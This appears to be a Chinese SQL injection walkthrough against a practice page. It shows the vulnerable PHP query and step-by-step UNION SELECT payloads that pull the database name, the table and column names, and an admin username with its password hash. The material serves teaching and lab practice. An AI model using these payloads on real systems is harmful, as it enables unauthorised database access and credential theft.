http://www.nanhack.com/payload/sql/number.php?id=1 and 1=1 页面正常
http://www.nanhack.com/payload/sql/number.php?id=1 and 1=2 页面不正常
说明后台sql语句再接受id这个参数的时候,并没有给参数添加引号,所以 1=1(真)和 1=2(假)生效了。如下
$id = $_GET['id'];
$sql = "select * from admins where id = $id";
#所以加上 and 1=1 语句就变为:
select * from admins where id = 1 and 1=1 #为真有数据
select * from admins where id = 1 and 1=2 #为假查不到数据
则确定,本页面注入类型为整形注入。
判断显示位:
http://www.nanhack.com/payload/sql/number.php?id=1 order by 8 #正常
http://www.nanhack.com/payload/sql/number.php?id=1 order by 9 #不正常,则显示位为8
联合查询
http://www.nanhack.com/payload/sql/number.php?id=-1 UNION SELECT 1,2,3,4,5,6,7,8
http://www.nanhack.com/payload/sql/number.php?id=-1 UNION SELECT 1,database(),3,4,5,6,7,8 #得到库名nanhack
爆表
http://www.nanhack.com/payload/sql/number.php?id=-1 UNION SELECT 1,group_concat(table_name),3,4,5,6,7,8 from information_schema.tables where table_schema=database()
#得到表名 admin_logs,admins,class,facebook,kaiban,message,news,user
爆表 admins 中的所有列
http://www.nanhack.com/payload/sql/number.php?id=-1 UNION SELECT 1,group_concat(column_name),3,4,5,6,7,8 from information_schema.columns where table_schema=database() and table_name='admins'
# 得到 列名 id,username,userpwd,email,sex,money,role,vip
获取 admins 中的一条数据
http://www.nanhack.com/payload/sql/number.php?id=-1 UNION SELECT 1,concat(username,0x23,userpwd),3,4,5,6,7,8 from admins limit 0,1
# 得到数据 必火网络安全#68d7e8e91c53395e3d29a938c1ab5d18